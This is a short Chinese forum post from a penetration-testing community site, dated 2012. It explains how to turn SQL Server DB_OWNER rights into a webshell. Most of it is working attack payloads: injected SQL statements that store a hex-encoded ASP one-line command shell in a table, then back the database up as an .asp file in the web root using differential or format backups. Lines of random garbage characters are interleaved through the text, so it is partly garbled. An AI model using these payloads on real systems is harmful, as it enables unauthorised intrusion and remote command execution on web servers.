中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
; W+ o6 L/ `$ |: _$ a2 c! L
( g2 G, \1 x, u/ X+ I
减少备份文件大小,得到可执行的webshell成功率提高不少
2 M+ S q4 p+ a' f0 w, x
一利用差异备份
$ {% r1 [0 f% S$ ~% v0 p; Z
加一个参数WITH DIFFERENTIAL
) v, ^1 m5 u, @% N& c5 K4 @
8 F7 H% J5 k' x; E7 _$ X; `
1
1 _* ]3 Q- ^- [: F
2
) W! f; t A5 }2 g: n
3
5 }0 Z9 V% J: b- K' W+ W
4
0 l9 w% L. k) @1 @# ^
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
4 D6 p3 L) }6 }* M) [- U
create table [dbo].[xiaolu] ([cmd] [image]);
0 B( t5 u2 o3 K1 l
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. |( D/ I6 v& G% \, V- Q+ u, t, e
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
$ r r/ i: n6 G9 j
$ c8 w! M% h5 _+ A" k+ e
二利用完全FORMAT
) p0 ?: X! y X' N5 w" a
加一个参数WITH FROMAT
Y7 }" M+ o; v( g2 P
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
* N. I) Z7 q7 y
4 H$ ^6 t+ n! ~# \1 O, T- K$ m8 ]
1
5 O2 A% |1 F$ h$ [- s
2
% ?$ ], Y% b( X+ Z; O
3
" I; J, T9 f! ~. j9 e! L: y
4
% S$ ]7 ~! z2 E! N, @- n
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
, d1 U$ e# W9 p% d* @, r9 ?
create table [dbo].[xiaolu] ([cmd] [image]);
4 o8 l9 j' ^( a! b! c+ J7 M
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" O1 v4 i- D+ T b
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
; o0 f: o8 @( P9 e& P8 x
! a) u s& ^0 [# z& r# f( D
总的来说就是那么简单几句,下面以备份数据库model为例子
& m" F" K3 W4 q- ?
1
) p6 K2 [8 Q8 c, G' n0 Q
" l# q: `& I& J# `
1
3 R7 Y2 j$ S" D4 f7 J
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
" j: G: J( t7 q" `
, [3 [2 t+ X" G4 l
2
. a2 O# [2 u# c& W0 ^
- h! r+ M$ J4 b! L* ~" m% ?+ E, K
1
& Z( x0 v9 H) n0 R7 F i
id=1;backup database model to disk='你的路径‘ with differential,format;--
( ?/ Y) Z+ @) o; X
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2